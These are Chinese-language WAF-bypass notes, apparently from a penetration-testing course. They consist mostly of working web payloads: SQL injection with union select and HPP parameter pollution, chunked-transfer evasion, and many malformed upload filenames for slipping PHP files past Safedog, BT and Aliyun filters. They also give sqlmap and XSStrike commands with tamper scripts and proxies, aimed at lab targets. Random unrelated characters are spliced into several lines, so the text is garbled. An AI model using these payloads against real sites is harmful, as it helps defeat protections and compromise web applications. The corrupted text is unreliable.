1蟹略、在漏洞發(fā)現(xiàn)中登失,WAF會對三個方向進行過濾攔截:
1、速度流量問題
2科乎、工具的指紋被識別
3壁畸、工具的檢測Poc或Payload
2、WAF攻防-漏洞利用HPP污染&分塊傳輸&垃圾數(shù)據(jù)
1茅茂、SQL注入&文件上傳繞過
2捏萍、XSS跨站&其他漏洞繞過
3、HPP污染&垃圾數(shù)據(jù)&分塊等
安全狗-SQL注入&文件上傳-知識點
SQL注入 https://www.cnblogs.com/cute-puli/p/11146625.html
關鍵字替換
http://192.168.0.100:8081/sqlilabs/Less-2/?id=1 like 1
http://192.168.0.100:8081/sqlilabs/Less-2/?id=1 like 12
更換提交方式:
POST id=-1 union select 1,2,3--+
模擬文件上傳 傳遞數(shù)據(jù)
分塊傳輸:更改數(shù)據(jù)請求格式
https://github.com/c0ny1/chunked-coding-converter
HPP參數(shù)污染:id=1/*&id=-1%20union%20select%201,2,3%23/
文件上傳:換行解析&垃圾溢出&%00干擾&=符號干擾&參數(shù)模擬
filename=a.php
filename="a.php
filename="a.php%00"
垃圾數(shù)據(jù);filename="a.php"
無限filename;filename="a.php"
filename=="a.php"
filename="name='uploadfile.php"
filename="Content-Disposition: form-data.php"
filename=="a.ph
p"
BT&Aliyun-SQL注入&文件上傳-知識點
python sqlmap.py -u "http://test.xiaodi8.com/pikachu/vul/sqli/sqli_str.php?name=*&submit=%E6%9F%A5%E8%AF%A2" --random-agent --tamper=rdog.py --proxy="http://tps118.kdlapi.com:15818"
格式替換
BT&Aliyun-文件包含&代碼執(zhí)行-知識點
https://github.com/s0md3v/XSStrike
python xsstrike.py -u "http://test.xiaodi8.com/pikachu/vul/xss/xss_reflected_get.php?message=1&submit=submit" --proxy
txt=y);&submit=%E6%8F%90%E4%BA%A4
文件包含:沒什么好說的就這幾種
..\ ..../ ...\等
安全狗:
注入 xss 文件上傳攔截
rce 文件包含 等其他不攔截
寶塔:
注入 上傳攔截
rce 文件包含 xss等其他不攔截
其中攔截的是關鍵字
aliyun
攔截的CC速度 和 后門 信息收集和權限維持階段攔截
漏洞利用 他不攔截 默認的版本(升級版本沒測試)
WAF PHP環(huán)境 JAVA不支持